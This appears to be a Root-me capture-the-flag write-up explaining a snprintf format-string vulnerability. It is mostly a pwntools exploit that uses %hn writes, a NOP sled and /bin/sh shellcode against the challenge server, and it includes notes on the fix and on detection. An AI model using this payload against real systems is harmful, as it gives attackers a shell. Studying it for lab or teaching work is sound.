Root-me
The vulnerability lies in the call
snprintf(outbuf,size(outbuf),inbuf)
As you can see, snprintf's third argument must be the format string, and here it is supplied by us.
Hence we can exploit it! But the problems I faced were:
1) the address of the shellcode differs between running the binary directly and running it under gdb, so to compensate we add a lengthy NOP sled
2) the MSB (high half-word) value is less than the LSB (low half-word) value, so we have to write %6$hn first and then %5$hn
# Proof-of-concept for the format-string bug described above: attacker-controlled
# input is passed as snprintf()'s *format* argument (CWE-134, uncontrolled format
# string), so "%u"/"%hn" directives in the input read and write the caller's stack.
# Defender's note: the fix is a constant format, snprintf(outbuf, sizeof(outbuf), "%s", inbuf);
# gcc's -Wformat-security (or -Werror=format-security) warns when the format is not a literal.
from pwn import *
# Raw 32-bit x86 machine code sent as the final stage (int 0x80 syscalls; the
# trailing bytes spell "/bin//sh"). Treated as an opaque blob here.
shellcode="\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
# Half-word values for the two %hn writes below. num1 is reduced by 8 because the two
# packed addresses at the start of fmtstr already count as 8 printed bytes when the
# first %hn fires (8 + num1 == 0xbfff); num2 is the extra width needed so the running
# character count reaches 0xf7ac when the second %hn fires.
num=0xbfff
num1=0xbfff -8
num2 = 0xf7ac - num
# Earlier value sets kept for reference (the author's previous attempts).
#num = 0xccc4+16
#num1= num - 78
#num2 = 0xffff - num
#r=remote('localhost',56032)
# Challenge endpoint named on the page.
r=remote('challenge02.root-me.org',56032)
# Two 4-byte target addresses followed by width-padded %u and %hn writes. The script
# assumes the packed addresses land at stack-argument positions 5 and 6 ("%5$hn",
# "%6$hn"); the high half (0x0804a04e) is written first because its value is the
# smaller of the two (see note 2 above).
fmtstr = pack(0x0804a04c)+pack(0x0804a04e)+"%"+str(num1)+"u"+"%6$hn"+"%"+str(num2)+"u"+"%5$hn"
# Pad with NOPs so the whole payload is exactly 1016 bytes; presumably the target's
# input buffer length — TODO confirm against the binary.
noplen = (1016-len(fmtstr)-len(shellcode))
nopsled = "\x90"*noplen
payload = fmtstr+nopsled+shellcode
# Detection note: large "%<n>u" widths combined with "%hn"/"%n" inside untrusted
# input are a reliable signature of this attack class.
r.sendline(payload)
r.interactive()